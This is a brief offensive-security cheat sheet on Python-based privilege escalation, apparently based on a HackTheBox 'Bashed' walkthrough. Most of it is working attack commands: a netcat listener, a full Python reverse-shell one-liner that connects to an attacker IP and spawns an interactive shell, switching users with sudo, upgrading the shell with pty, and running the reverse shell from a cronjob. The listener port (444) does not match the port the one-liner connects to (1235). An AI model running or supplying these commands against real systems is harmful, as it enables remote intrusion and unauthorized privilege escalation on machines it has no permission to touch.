Privilege Escalation
python privilege escalation
requirements: Need to be able to plant a *.py or modify an existing one as a higher privileged user
more at apt-secure.ca
You currently have a terminal( be that in a browser or by some other means). Here are some things to do with python.
Quickly determine versions of local python
#whereis python
#python -c 'import sys; print(sys.path)' -->get path
open listener on attacking machine
#nc -nlvp 444
from target terminal(web) run python
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
attacking machine should have shell
do you have a list of users?
yes
because you know users and you know their shells we can potentially switch to that user
#sudo -u <diff user name> /bin/bash (or whatever their shell is)
upgrade shell with python
#python -c 'import pty; pty.spawn("/bin/bash");'
you may have root at this point
you can do a reverse shell from this account
open listener on attacker
run reverse shell script above. In some scenarios you may need to run the script from an already running cronjob
no
you may not need escalation at this point, but unlikely
Reference:
[1] https://danishzia.medium.com/hackthebox-htb-bashed-walkthrough-ab402b9f4715